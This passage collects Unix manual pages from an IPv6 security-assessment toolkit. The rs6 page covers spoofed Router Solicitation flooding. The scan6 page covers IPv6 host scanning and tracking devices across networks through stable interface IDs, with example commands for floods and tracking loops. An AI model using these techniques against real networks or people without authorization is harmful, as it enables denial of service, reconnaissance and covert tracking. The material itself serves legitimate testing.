option, with the default delay of 1 second). .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B rd6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/rs6.1000066400000000000000000000216571254360455000166610ustar00rootroot00000000000000.TH RS6 1 .SH NAME rs6 \- A security assessment tool for attack vectors based on ICMPv6 Router Solicitation messages .SH SYNOPSIS .B rs6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-E LINK_ADDR] [\-e] [\-F N_SOURCES] [\-z SECONDS] [\-l] [\-v] [\-h] .SH DESCRIPTION .B rs6 allows the assessment of IPv6 implementations with respect to a variety of attacks based on ICMPv6 Router Solicitation messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .SH OPTIONS .B rs6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options and option data) to be conveyed into the Router Solicitations, it may be necessary for rs6 to split that information into more than one Router Solicitation. Also, when the rs6 tool is instructed to flood the victim with Router Solicitations from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. rs6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Router Solicitation message. IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option is meant to specify the IPv6 Source Address (or IPv6 prefix) to be used for the Router Solicitation messages. If left unspecified, a randomized link-local unicast (fe80::/64) address is selected. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the Router Solicitation messages. If left unspecified, but the Ethernet Destination Address is specified, the "all-routers link-local multicast" address (ff02::2) is selected as the IPv6 Destination Address. .TP \-\-hop\-limit, \-A This option specifies the IPv6 Hop Limit to be used for the Router Solicitation messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Router Solicitation messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link-layer Source Address of the Router Solicitation messages (currently, only Ethernet is supported). If left unspecified, the link-layer Source Address is randomized. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link-layer Destination Address of the Router Solicitation messages (currently, only Ethernet is supported). If left unspecified, the link-layer Destination Address is set to "33:33:00:00:00:02" (the Ethernet address that corresponds to the "all-routers link-local multicast" address). .TP \-\-source\-lla\-opt, \-E This option specifies the contents of a source link-layer address option to be included in the Router Solicitation messages. If more than one source link-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Router Solicitation, multiple Router Solicitations will be sent as needed. .TP \-\-add\-slla\-opt, \-e This option instructs the rs6 tool to include a source link-layer address option in the Router Solicitation messages that it sends. The link-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Router Solicitation messages. .TP \-\-flood\-sources, \-F This option instructs the rs6 tool to send Router Solicitations from multiple (and random) IPv6 Source Addresses. The number of different sources is specified as "\-F number". The IPv6 Source Address of each Router Solicitation is a randomized from the IPv6 prefix specified with the "\-s" option, and defaults to a random link-local unicast address (fe80::/64). .TP \-\-loop, \-l This option instructs the rs6 tool to send periodic Router Solicitations to the destination node. The amount of time to pause between sending Neighbor Solicitations can be specified by means of the "\-z" option, and defaults to 1 second. .TP \-\-sleep, \-z This option instructs the rs6 tool to the amount of time to pause between sending Router Solicitation messages. If left unspecified, it defaults to 1 second. .TP \-\-verbose, \-v This option instructs the rs6 tool to be verbose. .TP \-\-help, \-h Print help information for the rs6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B rs6 tool. \fBExample #1\fR # rs6 \-i eth0 \-e Use the network interface "eth0" to send a Router Solicitation using a random link-local unicast IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination Address "ff02::2" ("all-routers link-local multicast" address, selected by default) and the Ethernet Destination Address "33:33:00:00:00:02" (selected by default). The Router Solicitation also includes a source link-layer address option, that contains the same Ethernet address as that used for the Ethernet Source Address of the packet. \fBExample #2\fR # rs6 \-i eth0 \-e \-F 100 \-l \-z 10 \-v Send 100 Router Solicitation messages using a random Ethernet Source Address and random IPv6 Source Address for each of them, to the Ethernet Destination Address "33:33:00:00:00:02" (default) and the IPv6 Destination Address "ff02:2" (default). Each message includes a source link-layer address option that contains the same link-layer address as that used for the Ethernet Source Address of the packet. Repeat this operation every ten seconds. Be verbose. \fBExample #3\fR # rs6 \-i eth0 \-d fe80::1 \-E ff:ff:ff:ff:ff:ff \-v Send one Router Solicitation message using a random Ethernet Source Address and a random link-local unicast (i.e., fe80::/64) IPv6 Source Address, to the Ethernet Destination Address "33:33:00:00:00:02" (default) and the IPv6 Destination Address "fe80::1". Each Router Solicitation includes a source link-layer address option that contains the Ethernet address "ff:ff:ff:ff:ff:ff". Be verbose. .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B rs6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/scan6.1000066400000000000000000000601671254360455000171600ustar00rootroot00000000000000.TH SCAN6 1 .SH NAME scan6 \- An IPv6 host scanner .SH SYNOPSIS .B scan6 .RB [\| \-i .IR INTERFACE \|] .RB [\| \-s .IR SRC_ADDR \|[/\| LEN \|]] .RB [\| \-d .IR DST_ADDR \|[/\| LEN\| .RB | \ \-L \|] .RB [\| \-r \|] .RB [\| \-S .IR LINK_SRC_ADDR | \-R\|] .RB [\| \-p .IR PROBE_TYPE \|] .RB [\| \-P .IR PAYLOAD_SIZE \|] .RB [\| \-o .IR SRC_PORT \|] .RB [\| \-a .IR DST_PORT \|] .RB [\| \-X .IR TCP_FLAGS \|] .RB [\| \-P .IR ADDRESS_TYPE \|] .RB [\| \-e \|] .RB [\| \-x .IR RETRANS \|] .RB [\| \-o \| .IR TIMEOUT \|] .RB [\| \-V .IR VM_TYPE \|] .RB [\| \-b \|] .RB [\| \-B .IR IPV4_ENCODING \|] .RB [\| \-k .IR IEEE_OUI \|] .RB [\| \-K .IR VENDOR \|] .RB [\| \-m .IR PREFIXES_FILE \|] .RB [\| \-w .IR IIDS_FILE \|] .RB [\| \-W .IR IID \|] .RB [\| \-T \|] .RB [\| \-Q .IR PREFIX/LEN \|] .RB [\| \-I .IR INC_SIZE \|] .RB [\| \-c .RB [\| \-r .IR LIMIT \|] .RB [\| \-l \|] .RB [\| \-z .IR SECONDS \|] .RB [\| \-R \|] .RB [\| \-v \|] .RB [\| \-h \|] .SH DESCRIPTION .B scan6 is an IPv6 address scanning tool that implements a number of advanced IPv6 address scanning techniques. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. \fBHOST SCANNING TECHNIQUES\fR .B scan6 employs a number of techniques to discover active IPv6 nodes. The following subsections discuss the different techniques employed for each type of IPv6 scan. \fBLocal scans\fR For local scans, .B scan6 operates (roughly) as follows: .sp .RS 4 .nf \+ The tool learns the local prefixes used for auto\-configuration, \ and generates one address for each local prefix (in addition to \ a link\-local address) \+ An ICMPv6 Echo Request message destined to the all-nodes on-link \ multicast address (ff02::1) is sent with each of the addresses \ "configured" in the previous step. Probe packets are sent with \ different Source Addresses, such that they elicit responses from \ different addresses (as a result of the default IPv6 Source \ Address selection policy). Hence. all (or most) addresses of \ each node can be discovered. \+ The same procedure of the previous bullet is performed, but \ this time with ICMPv6 packets that contain an unrecognized \ option of type 10xxxxxx, such that ICMPv6 Parameter Problem \ error messages are elicited. This allows the tool to discover \ e.g. Windows nodes, which otherwise do not respond to multicasted \ ICMPv6 Echo Request messages. \+ Each time a new "alive" address is discovered, the corresponding \ Interface\-ID is combined with all the local prefixes, and the \ resulting addresses are probed (with unicasted packets). This \ can help to discover all the SLAAC\-derived and the "private \ addresses", since some responses might contain e.g. Modified \ EUI-64 Format Identifiers, which are likely used with all the \ available prefixes. \+ Finally, the tool removes any duplicate addresses, such that each \ unique address is informed to the user only once. .fi .RE The aforementioned scheme can fail to discover some addresses for some implementation. For example, Mac OS X employs IPv6 addresses embedding IEEE-identifiers when responding to packets destined to a link\-local multicast address (and hence the temporary addresses could not be learned). \fBRemote scans\fR scan6 employs a number of bran\-new techniques for performing address scans of remote networks. Namely, it tries to mitigate a number of patterns in IPv6 addresses, such that the (theoretical) search space of 2**64 addresses is dramatically reduced. scan6 can leverage the following address patterns: .sp .RS 4 .nf \+ SLAAC addresses of specific vendors: Addresses that embedd the MAC \ address of the corresponding network interface card. \+ virtual host addresses: Most virtualization technologies select \ their MAC addresses from specific IEEE OUIs (e.g., VirtualBox \ employs the OUI 00:50:56) \+ "low-byte" addresses: in which only the lowest order (or the two \ lowest order) word of the IID contains a small integer (with the \ rest of the words being set to zero) \+ "port\-based" addresses: in which one of the two low order 16 bit \ 16\-bit words of the IID encodes de service port number of the \ main service being hosted on the targer node. \+ IPv4\-based addresses: in which the IID encodes the IPv4\-address \ of the network interface (as in 2001:db8::192.168.1.1 or \ 2001:db8::192:168:1:1) .fi .RE A thorough discussion of these address patterns can be found in: . \fBHOST TRACKING\fR .B scan6 can be employed to track IPv6 nodes across networks. Since IPv6 StateLess Address Auto-Configuration (SLAAC) typically results in globally-unique Interface Identifiers (IIDs) that are constant across networks, such identifiers can be leveraged to track nodes across a range of "known" networks, by periodically probing the IPv6 address composed of the IPv6 prefix of the target network, and the (known) Interface ID of the target node. For host-tracking purposes, the target networks can be specified with the '\-d' and/or '\-m' options, while the target Interface IDs can be specified with the '\-w' and/or the '\-W' options (see the documentation of each option for further information). Since for tracking purposes one will continually track the user across networks, the '\-l' option will typically be set. Additionally, the '\-z' option may be used to specify the number of seconds to sleep between iterations (i.e. each round of probes send to the specified targets). The value specified by the '\-z' option represents a trade-off between time-liness of the tracking and bandwidth-consumption. IPv6 host-tracking is discussed in detail in . .SH OPTIONS .B scan6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). .TP .BI \-i\ interface ,\ \-\-interface\ interface This option specifies the network interface to be used by the .B scan6 tool, and is mandatory when performing local address scans (\-L option). .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 Source Address to be used for the Source Address of the probe packets. If a prefix is specified, the Source Address is randomly selected from that prefix. If this option is left unspecified, the addresses currently configured for the specified network interface card are used. .TP .BI \-d\ DST_ADDRESS ,\ \-\-dst\-address\ DST_ADDRESS This option specifies the target address prefix/range of the address scan. An IPv6 prefix can be specified in the form 2001:db8::/64, or as 2001:db8:a-b:1\-10 (where specific address ranges are specified for the two low order 16\-bit words). This option must be specified for remote address scanning attacks. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-link\-src\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets (currently, only Ethernet is supported). If left unspecified, the real link\-layer address of the interface is used. Note: Some systems may discard packets when the link\-layer address is forged. That is, even when the relevant function calls (and hence the scan6 tool itself) may return "success", packets may be discarded and not actually sent on the specified network link. In such scenarios, the real Ethernet address should be used. This type of behaviour has been found in some Linux systems. .TP .BI \-p\ PROBE_TYPE ,\ \-\-probe\-type\ PROBE_TYPE This option specifies the probe packets to be used for address scanning. For local-network address scans, possible arguments are: "echo" (for ICMPv6 Echo Request), "unrec" (for IPv6 packets with unrecognized IPv6 options of type 10xxxxxx), and "all" (for using both ICMPv6 Echo Requests probes and unrecognized options of type 10xxxxxx). If left unspecified, this option defaults to "all". For remote-network scans, this option defaults to "echo" (if left unspecified). .TP .BI \-P\ PAYLOAD_SIZE ,\ \-\-payload\-size\ PAYLOAD_SIZE This option specifies the payload size of the probe packet. It defaults to 0 for TCP (i.e., empty TCP segments), and to 56 for ICMPv6. .TP .BI \-o\ SRC_PORT ,\ \-\-src\-port\ SRC_PORT This option specifies the TCP/UDP Source Port. If left unspecified, the Source Port is randomized from the range 1024\-65535. .TP .BI \-a\ DST_PORT ,\ \-\-dst\-port\ DST_PORT This option specifies the TCP/UDP Destination Port. If left unspecified, the Destination Port is randomized from the range 1\-1024. .TP .BI \-X\ TCP_FLAGS ,\ \-\-tcp\-flags\ TCP_FLAGS This option is used to set specific the TCP flags. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If this option is left unspecified, the ACK bit is set on all probe packets. .TP .BI \-P\ ADDR_TYPE ,\ \-\-print\-type\ ADDR_TYPE This option specifies the address types to be printed/informed by the .B scan6 tool. The possible arguments are: "local" (link\-local addresses), "global" (global addresses), and "all" (print both link\-local and global-addresses). If left unspecified, this option defaults to "all" (print both link\-local and global-addresses). .TP .BR \-q ,\ \-\-print\-unique This option specifies that for each address scope (local and/or global) only one IPv6 address per Ethernet address should be printed. This option can be useful when interest is in identifying unique systems (e.g. for counting the number of systems connected to the local network), rather than the number of configured addresses on the local network. Note: In the case of systems that implement "Privacy Extensions for SLAAC" (IETF RFC 4941), more than one global unicast address will typically be found by the scan6 tool. .TP .BR \-e\| ,\ \-\-print\-link\-addr This option specifies that the link\-layer addresses should be printed along with the IPv6 addresses, with the format "IPV6ADDRESS @ LINKADDRESS". .TP .BR \-t\| ,\ \-\-print\-timestamp This option specifies that a timestamp should be printed after the IPv6 address of each alive node. .TP .BI \-x\ NO_RETRANS ,\ \-\-retrans\ NO_RETRANS This option specifies the number of times probe packets should be retransmitted when no response is received. Note: If left unspecified, the number of retransmission defaults to 0 (i.e., no retransmissions). Note: this option might be useful when packets must traverse unreliable and/or congested network links. .TP .BI \-o\ TIMEOUT ,\ \-\-timeout\ TIMEOUT This option specifies the amount of time that the tool should wait for responses to probe packets. If left unspecified, the timeout value defaults to 1 second. Note: this option might be useful when scanning hosts on long-delay links. .TP .BR \-L ,\ \-\-local This option specifies that host scanning should be performed on the local subnet. The type of probe packets to be used can be specified with the "\-p" option. .TP .BR \-R\| ,\ \-\-rand\-link\-src\-addr This option specifies that the Ethernet Source Address should be randomized. .TP .BI \-V\ VM_TYPE ,\ \-\-tgt\-virtual\-machines\ VM_TYPE This option specifies that the target is virtual machines. Possible options are: 'vbox' (VirtualBox), 'vmware' (vmware), and 'all' (both VirtualBox and vmware). When this option is specified, scan6 can narrow dow the search space by targeting only those IEEE OUIs employed by the aforementioned virtualization software. Note: For vmware, the search space can be further reduced if the '\-\-ipv4\-host' option is specified. .TP .BR \-b\| ,\ \-\-tgt\-low\-byte This option specifies that the target is IPv6 nodes employing "low-byte" addresses. Low byte addresses are generated by concatenating the IPv6 prefix specified by the "\-d" option with an Interface I-D of the form "0:0:0\-100:0\-1500". .TP .BI \-B\ IPV4_ENCODING ,\ \-\-tgt\-ipv4\ IPV4_ENCODING This option specifies that the target is IPv6 addresses that embed an IPv4 address. Possible encondings are "ipv4-32" (where the IPv4 address is embedded in the low-order 32 bits of the IPv6 address), "ipv4-64" (where the IPv4 address is embedded in the low-order 64 bits of the IPv6 address), and "ipv4-all" (which is equivalent to setting both the "ipv4-32" and "ipv4-64" encodings). When this option is set, a prefix should be specified with the '\-\-ipv4\-host' option, such that the search space is reduced. Note: When an IPv4 address is encoded in 64 bits, each byte of the IPv4 address is firstly converted to a number that has the same representation in hexadecimal (e.g., 100 would be converted to 256, since the hexadecimal representation of 256 is 0x100) before that byte is embedded in a 16-bit word. For example, the IPv4 address 192.168.0.1 would result, when combined with the prefix 2001:db8::/32 in the IPv6 address 2001:db8::192:168:0:1 (note that while each byte of the original IPv4 address has the same representation within the IPv6 address, each value now stands for an hexadecimal number). .TP .BR \-g\| ,\ \-\-tgt\-port This option specifies that the target is IPv6 addresses that embed service ports (such as 2001:db8::25, 2001:db8::80, etc.). When this option is set addresses containing these ports will be probed: .sp .RS 4 .nf 21 (ftp) 22 (ssh) 23 (telnet) 25 (smtp) 49 (tacacs) 53 (dns) 80 (www) 110 (pop3) 123 (ntp) 179 (bgp) 220 (imap3) 389 (ldap) 443 (https) 547 (dhcpv6\-server) 993 (imaps) 995 (pop3s) 1194 (openvpn) 3306 (mysql) 5060 (sip) 5061 (sip-tls) 5432 (postgresql) 6446 (mysql-proxy) 8080 (http-alt) .fi .RE Note: The target IPv6 addresses are generated by concatenating the service port to an IPv6 prefix/range specified by means of the "\-d" option. For each service port, four target address ranges will be generated: * PREFIX::0\-5:HEX_PORT, * PREFIX::HEX_PORT:0\-5, * PREFIX::0\-5:DEC_PORT, and, * PREFIX::DEC_PORT:0\-5 That is, IPv6 address ranges will be generated with both the service port in hexadecimal notation, and the service port in decimal notation, since both types of addresses have been found in the wild. .TP .BI \-k\ IEEE_OUI ,\ \-\-tgt\-ieee\-oui\ IEEE_OUI This option is used to specify an IEEE OUI, such that the target of the scan is SLAAC addresses that employ the aforementioned IEEE OUI. .TP .BI \-K\ VENDOR ,\ \-\-tgt\-vendor\ VENDOR This option allows the user to specify a vendor name. scan6 will look-up all the correspoinding IEEE OUIs for such vendor, and then scan for SLAAC addresses that employ the aforementioned IEEE OUIs. .TP .BI \-m\ PREFIXES_FILE ,\ \-\-prefixes\-file\ PREFIXES_FILE This option specifies the name of a file containing a list of IPv6 addresses and/or IPv6 prefixes, one per line, in the same format as that used with the '\-d' option. Note: The file can contain comments if they are preceded with the numeral sign ('#'), as in: IPv6_address/len # comment # comment IPv6_address .TP .BI \-w\ IIDS_FILE ,\ \-\-tgt\-iids\-file\ IIDS_FILE This option specifies the name of a file containing one IPv6 address per line. The Interface ID of each of those IPv6 addresses will be employed, together with the network prefix specified with the '\-d' option, to construct the IPv6 addresses to be probed. Since auto-configured addresses typically employ Interface IDs that are constant across networks, this option can leverage known IIDs to track such nodes across networks. Please see for further details. Note: The file can contain comments if they are preceded with the numeral sign ('#'), as in: IPv6_address # comment .TP .BI \-W\ IID ,\ \-\-tgt\-iid\ IID This option specifies an IPv6 Interface Identifier (IID), with the same syntax as that of an IPv6 address (only the lowest-order 64 bits of the address will be employed). The specified Interface ID will be employed, together with the any network prefixes specified with the '\-d' option (or with the '\-m' option), to construct the IPv6 addresses to be probed. Since auto-configured addresses typically employ Interface IDs that are constant across networks, this option can leverage known IIDs to track such nodes across networks. Please see for further details. Note: The file can contain comments if they are preceded with the numeral sign ('#'), as in: IPv6_address # comment .TP .BR \-T ,\ \-\-sort\-ouis This option, when used in conjunction with the "\-\-tgt\-vendor" option, tells the scan6 tool to "sort" the IEEE OUIs corresponding to a vendor. Namely, OUIs are employed in descending order, with the largest OUI used last (together with the smallest OUI). The rationale for this option is that when a vendor has been assigned multiple OUIs, chances are that the smaller (and "oldest") OUI was used for devices that have already been put "out of service", while the largest (and "newest") OUI has probably not yet been used for deployed devices. .TP .BI \-Q\ PREFIX/LEN ,\ \-\-ipv4\-host\ PREFIX/LEN This option allows the user to specify an IPv4 prefix. The aforementioned prefix is employed with the "\-\-tgt\-virtual\-machines" and/or "\-\-tgc\-ipv4\-embeded" options to reduce the search space. .TP .BI \-I\ INC_SIZE ,\ \-\-inc\-size\ INC_SIZE This option is used to specify the increment size for the lowest-order 16-bit word of an IPv6 address when an IPv6 address range is to be scanned. This option is particularly useful if the target network is assumed to contain a large number of nodes with consecutive addresses (maybe because the target network employs DHCPv6, or because the target network contains a large number of devices from the same manufacturer, thus employing consecutive MAC/SLAAC addresses). The increment size should be that of the assumed size of the "cluster" of nodes. .TP .BI \-r\ RATE ,\ \-\-rate\-limit\ RATE This option specifies the rate limit to use when performing a remote address scan. "RATE" should be specified as "Xbps" or "Xpps" (with "X" being an unsigned integer), for rate-limits in bits per second or packets per second, respectively. In general, the address scan should be rate-limited to about 80% (eighty percent) of the upstram bandwidth, such that probe packets are not lost as a result of network congestion. Note: If left unspecified, the scan6 will rate\-limit the probe packets to 1000 packets per second (pps). .TP .BR \-l\| ,\ \-\-loop This option specifies that the tool should periodically loop through the specified targets. It is mostly useful to e.g. when a node disconnects from the network, or for host-tracking purposes. .TP .BI \-z\ SECONDS ,\ \-\-sleep\ SECONDS This option specifies the amount of time (in seconds) that the tool should sleep in-between iterations over the specified targets. It is only meaningful when the '\-l' option is set. .TP .BI \-c\ CONFIG_FILE ,\ \-\-config\-file\ CONFIG_FILE This option is used to specify an alternative configuration file. If left unspecified, the tool will employ '/etc/ipv6toolkit.conf'. .TP .BR \-v\| ,\ \-\-verbose This option selects the "verbosity" of the tool. If this option is left unspecified, only minimum information is printed. If this option is set once, additional information is printed (e.g., the tool indicates which addresses are "link\-local" and which addresses are "global"). If this option is set twice, detailed information will be printed in the case the tool finds any problems when performing host scanning. .TP .BR \-h\| ,\ \-\-help Print help information for the .B scan6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B scan6 tool. \fBExample #1\fR # scan6 \-i eth0 \-L \-e \-v Perform host scanning on the local network ("\-L" option) using interface "eth0" ("\-i" option). Use both ICMPv6 echo requests and unrecognized IPv6 options of type 10xxxxxx (default). Print link-link layer addresses along with IPv6 addresses ("\-e" option). Be verbose ("\-v" option). \fBExample #2\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-virtual\-machines all \-\-ipv4\-host 10.10.10.0/24 Scan for virtual machines (both VirtualBox and vmware) in the prefix 2001:db8::/64. The additional information about the IPv4 prefix employed by the host system is leveraged to reduce the search space. \fBExample #3\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-ipv4\-embedded ipv4\-32 \-\-ipv4\-host 10.10.10.0/24 Scan for IPv6 addresses of the network 2001:db8::/64 that embed the IPv4 prefix 10.10.10.0/24 (with the 32-bit encoding). \fBExample #4\fR # scan6 \-d 2001:db8:0\-500:0\-1000 Scan for IPv6 addresses of the network 2001:db8::/64, varying the two lowest order 16\-bit words of the addresses in the range 0\-500 and 0\-1000, respectively. \fBExample #5\fR # scan6 \-d fc00::/64 \-\-tgt\-vendor 'Dell Inc' \-p tcp Scan for network devices manufactured by 'Dell Inc' in the target prefix fc00::/64. The tool will employ TCP segments as the probe packets (rather than the default ICMPv6 echo requests). \fBExample #6\fR # scan6 \-i eth0 \-L \-S 66:55:44:33:22:11 \-p unrec \-P global \-v Use the "eth0" interface ("\-i" option) to perform host-scanning on the local network ("\-L" option). The Ethernet Source Address is set to "66:55:44:33:22:11" ("\-S" option). The probe packets will be IPv6 packets with unrecognized options of type 10xxxxxx ("\-p" option). The tool will only print IPv6 global addresses ("\-P" option). The tool will be verbose. \fBExample #7\fR # scan6 \-d 2001:db8::/64 \-w KNOWN_IIDS Perform an address scan of a set of known hosts listed in the file KNOWN_IIDS, at remote network 2001:db8::/64. The target addresses are obtaining by concatenating the network prefix 2001:db8::/64 with the interface IDs of each of the addresses fund in the file KNOWN_IIDS. \fBExample #8\fR # scan6 \-i eth0 \-L \-P global \-\-print\-unique \-e Use the "eth0" interface ("\-i" option) to perform host-scanning on the local network ("\-L" option). Print only global unicast addresses ("\-P" option), and at most one IPv6 address per Ethernet address ("\-\-print\-unique" option). Ethernet addresses will be printed along with the corresponiding IPv6 address ("\-e" option). \fBExample #9\fR # scan6 \-m knownprefixes.txt \-w knowniids.txt \-l \-z 60 \-t \-v Build the list of targets from the IPv6 prefixes contained in the file 'knownprefixes.txt' and the Interface IDs (IIDs) contained in the file 'knowniids.txt'. Poll the targets periodically ("\-l" option), and sleep 60 seconds after each iteration ("\-z" option). Print a timestamp along the IPv6 address of each alive node ("\-t" option). Be verbose ("\-v" option). .SH SEE ALSO .BR ipv6toolkit.conf (5) draft\-ietf\-opsec\-ipv6\-host\-scanning (available at: .IR ) for a discussion of the IPv6 host\-tracking technique implemented by .B scan6 , and a proposal on how to mitigate such attacks. RFC 7217 (available at: .IR ) for a discussion of the potential Denial of Service (DoS) when scanning remote networks. > ) for a discussion of the scanning techniques implemented by .B scan6 , and a discussion of a number of aspects that should be taken into account when performing address scanning of remote networks. RFC 6583 (available at .IR ) for a discussion of the potential Denial of Service (DoS) when scanning remote networks. .SH AUTHOR The .B scan6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/script6.1000066400000000000000000000235261254360455000175360ustar00rootroot00000000000000.TH SCRIPT6 1 .SH NAME script6 \- A tool to make complex IPv6 tasks easy .B script6 .RB SCRIPT\| .IR [PARAMETERS \|] .SH DESCRIPTION .B script6 is a set up scripts that make frequent and/or rather complex IPv6\-related tasks easy. \fBSCRIPTS\fR \fBget\-aaaa\fR This script takes no further arguments, and operates as follows: .sp .RS 4 .nf \+ The tool reads domain names from standard-input (one per line), \ and obtains the AAAA records for the corresponding domain. If the \ domain name does not contain AAAA records, the tool will add \ the suffix "www.", in the hopes that the resulting domain name \ might contain some. \+ Lines where the first non-blank character is the numeral sign (#) \ are consdered to contain comments, and hence are ignored. \+ The format of the resulting output is: .fi .RE .sp .RS 4 .nf # DOMAIN_NAME (CANONIC_NAME) IPV6_ADDRESS_1 IPV6_ADDRESS_2 .fi .RE \fBget\-alexa-domains\fR This script takes no further arguments, and operates as follows: .sp .RS 4 .nf \+ It reads from standard input lines with the same format as those of Alexa's Top 1M web sites. That is, lines with the folowing syntax: .fi .RE .sp .RS 4 .nf RANKING,DOMAIN_NAME .fi .RE .sp .RS 4 .nf \+ It extracts the domainname from each line, and prints the corresponding domain name to standard output. .fi .RE This script is typically useful for extracting domain names from Alexa's Top 1M web sites file, such that they can be processed by other tools (e.g. the get\-aaaa command of script6). \fBget\-ns\fR This script takes no further arguments, and operates as follows: .sp .RS 4 .nf \+ The tool reads domain names from standard-input (oner per line), \ and obtains the NS records for the corresponding domain. \+ Lines where the first non-blank character is the numeral sign (#) \ are consdered to contain comments, and hence are ignored. \+ The format of the resulting output is: .fi .RE .sp .RS 4 .nf # DOMAIN_NAME (CANONIC_NAME) MX_RECORD_1 MX_RECORD_2 .fi .RE \fBget\-mx\fR This script takes no further arguments, and operates as follows: .sp .RS 4 .nf \+ The tool reads domain names from standard-input (oner per line), \ and obtains the MX for the corresponding domain. \+ Lines where the first non-blank character is the numeral sign (#) \ are consdered to contain comments, and hence are ignored. \+ The format of the resulting output is: .fi .RE .sp .RS 4 .nf # DOMAIN_NAME (CANONIC_NAME) MX_RECORD_1 MX_RECORD_2 .fi .RE \fBget\-ns\fR This script takes no further arguments, and operates as follows: .sp .RS 4 .nf \+ The tool reads domain names from standard-input (oner per line), \ and obtains the NS records for the corresponding domain. \+ Lines where the first non-blank character is the numeral sign (#) \ are consdered to contain comments, and hence are ignored. \+ The format of the resulting output is: .fi .RE .sp .RS 4 .nf # DOMAIN_NAME (CANONIC_NAME) MX_RECORD_1 MX_RECORD_2 .fi .RE \fBget\-trace\-stats\fR This command causes the script6 tool to read from standard input the results of a "script6 trace" command (typically piped from a file), and produce statistics based on such results. Among the statistics produced by this command are: * Packet drop rate: That is, the percentage of destination IPv6 addresses that result unreachable if IPv6 extension headers are employed. * Packet drop rate by different AS: That is, the percentage of packet drops that occur at an Autonomous System (AS) other than the AS corresponding 